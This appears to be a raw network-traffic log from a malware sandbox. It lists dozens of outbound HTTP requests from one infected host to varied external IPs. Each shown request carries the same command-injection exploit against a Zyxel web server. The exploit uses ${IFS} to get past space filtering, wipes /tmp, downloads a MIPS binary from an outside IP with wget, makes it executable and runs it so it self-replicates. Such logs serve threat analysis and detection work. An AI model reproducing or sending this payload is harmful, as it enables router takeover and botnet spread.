                                          Jan 14, 2024 15:46:22.113351107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5709192.168.2.235229246.204.71.40443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.113368988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5710192.168.2.2346562118.54.165.151443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.113393068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5711192.168.2.2342992106.74.18.205443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.113434076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5712192.168.2.2343068182.151.107.140443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.113437891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5713192.168.2.235965646.16.162.104443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.113467932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5714192.168.2.2351004119.60.51.94443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.113492012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5715192.168.2.233724413.73.50.79443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.113492012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5716192.168.2.2338888160.252.209.129443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.113524914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5717192.168.2.2354238184.27.109.213443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.113573074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5718192.168.2.2354770170.253.213.191443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.113575935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5719192.168.2.2345534124.204.65.136443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.113631964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5720192.168.2.2353130155.59.125.183443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.113650084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5721192.168.2.2357640137.118.39.202443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.113682032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5722192.168.2.2336190100.10.245.183443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.113702059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5723192.168.2.2341424165.222.102.108443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.113734961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5724192.168.2.2335878208.125.220.210443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.113764048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5725192.168.2.2355430118.230.87.159443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.113797903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5726192.168.2.234372895.219.112.130443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.113840103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5727192.168.2.233674858.82.49.230443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.113900900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5728192.168.2.23529365.92.195.154443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.113905907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5729192.168.2.235671094.192.199.139443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.113938093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5730192.168.2.2354654133.215.143.19443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.113962889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5731192.168.2.235844049.162.9.128443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.113976002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5732192.168.2.2333208173.236.139.173443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.113998890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5733192.168.2.2337428191.177.97.162443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.114048004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5734192.168.2.2334570183.227.121.134443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.114073992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5735192.168.2.2338262197.246.218.204443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.114103079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5736192.168.2.2358590114.129.55.139443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.114140987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5737192.168.2.2350628184.215.23.45443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.114140987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5738192.168.2.2339488216.157.154.65443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.114173889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5739192.168.2.2339774123.236.162.126443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.114200115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5740192.168.2.2351532209.139.183.181443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.114222050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5741192.168.2.2353248169.209.193.98443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.114249945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5742192.168.2.2354472174.173.36.67443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.114252090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5743192.168.2.233921478.213.96.160443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.114274979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5744192.168.2.2337752219.9.25.142443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.114319086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5745192.168.2.236027212.174.166.60443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.114343882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5746192.168.2.2346446137.133.72.83443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.114356995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5747192.168.2.234864274.45.205.208443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.114375114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5748192.168.2.235947083.201.117.26443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.114408016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5749192.168.2.233749041.123.75.43443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.114435911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5750192.168.2.2356252206.210.249.135443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.114448071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5751192.168.2.235814085.188.140.65443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.114475012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5752192.168.2.2352334201.45.206.84443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.114492893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5753192.168.2.235355283.156.45.95443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.114528894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5754192.168.2.234558096.251.47.254443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.114546061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5755192.168.2.2357370181.230.166.36443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.114593983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5756192.168.2.2353076186.238.178.48443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.114624977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5757192.168.2.2333568161.124.41.6443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.114639997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5758192.168.2.2349174142.5.216.59443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.114645004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5759192.168.2.2347126135.243.222.207443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.114665985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5760192.168.2.2333048130.20.121.104443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.114692926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5761192.168.2.2341854101.168.177.97443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.114748001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5762192.168.2.2354102189.23.247.83443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.114749908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5763192.168.2.233328442.241.234.23443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.114770889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5764192.168.2.2359672176.58.239.113443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.114793062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5765192.168.2.2333278130.134.100.215443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.114824057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5766192.168.2.235229465.53.202.179443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.114837885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5767192.168.2.235513642.128.182.63443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.114861965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5768192.168.2.23411482.150.23.135443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.114896059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5769192.168.2.2357434148.216.199.13443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.114912987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5770192.168.2.2343440135.23.246.55443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.114943981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5771192.168.2.233704483.241.171.143443
                                          TimestampBytes transferredDirectionData
